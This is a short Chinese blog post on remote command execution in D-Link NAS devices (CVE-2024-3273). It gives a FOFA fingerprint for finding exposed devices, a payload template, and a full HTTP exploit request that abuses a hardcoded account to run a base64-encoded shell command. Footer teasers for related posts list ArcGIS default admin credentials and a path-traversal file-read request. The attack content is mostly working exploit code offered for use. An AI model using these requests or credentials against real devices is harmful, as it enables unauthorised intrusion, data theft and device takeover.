D-Link-NAS远程命令执行

发表于2025-02-12|更新于2025-02-12|WEB攻防

|总字数:244|阅读时长:1分钟|浏览量:|评论数:

简介

D-Link NAS（网络附加存储）设备为家庭和小型企业提供了一种便捷的数据存储和共享解决方案

数据存储与备份：支持大容量硬盘，提供集中存储和自动备份功能。
文件共享：支持SMB/CIFS、NFS、FTP等协议，方便多用户访问。
远程访问：通过D-Link的mydlink服务，用户可远程访问和管理NAS数据。
多媒体支持：内置DLNA和UPnP AV媒体服务器，支持流媒体播放。
数据安全：支持RAID、密码保护和加密技术，确保数据安全。

漏洞

CVE-2024-3273远程命令执行

fofa指纹：_fid=”hWN+yVVhLzKJaLkd/ITHpA==”
payload：system={{base64_enc(cmd)}}

GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
Accept-Encoding: identity
Accept: */*
Connection: keep-alive

文章作者: X1ly?S

文章链接: https://x1lys.github.io/2025/02/12/D-Link-NAS远程命令执行/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 X1ly?S！

技术交流，互相学习

联系我

相关推荐

Apache_ActiveMQ漏洞-上

Apache ActiveMQ 简介ActiveMQ 是一个开源的消息中间件，主要用于实现消息的异步传递和处理。它支持多种消息协议（如 JMS、AMQP 和 MQTT），使得不同的应用程序能够在不同的平台之间进行通信主要特点高性能：支持高吞吐量和低延迟的消息传递，适用于需要高并发的应用场景。支持多种协议：除了 JMS，ActiveMQ 还支持多种协议，方便与其他系统集成。可靠性：提供消息持久化功能，确保消息在系统故障时不会丢失。可扩展性：可以根据需求水平扩展，适应不同规模的应用。易于使用：提供丰富的管理工具和易于理解的配置文件，使得部署和管理相对简单。集成能力：能够与 Spring、Apache Camel 等框架无缝集成，增强应用的灵活性。应用场景实时数据处理微服务架构中的服务间通信事件驱动架构系统解耦合 Apache ActiveMQ漏洞Apache ActiveMQ未授权没有配置密码，直接访问/admin，可进入后台 Apache...

简介ArcGIS 是由 Esri（Environmental Systems Research Institute）开发的地理信息系统（GIS）软件系列，广泛应用于地图制作、空间分析、数据管理和可视化等领域。ArcGIS 提供了一套完整的工具，帮助用户收集、管理、分析和展示地理信息。默认信息端口：6080 后台地址：/arcgis/admin/ 后台密码：siteadmin/siteadmin 漏洞任意文件读取1234567GET /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.0Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept:...

Apache-Spark未授权访问漏洞

Apache-Spark未授权访问漏洞简介Apache Spark 是一个开源的统一分析引擎，旨在大规模数据处理和高速计算。它最初由加州大学伯克利分校的 AMPLab 开发，并于2010年开源，随后在2013年进入Apache软件基金会孵化器，并在2014年成为顶级项目。Spark 以其在内存中处理数据的能力而闻名，可以大幅提高大数据分析的速度和效率。漏洞原理Apache Spark 未授权访问漏洞主要是由于 Spark 的默认配置或不安全配置导致未经授权的用户能够访问 Spark 的 Web UI 和 REST...

评论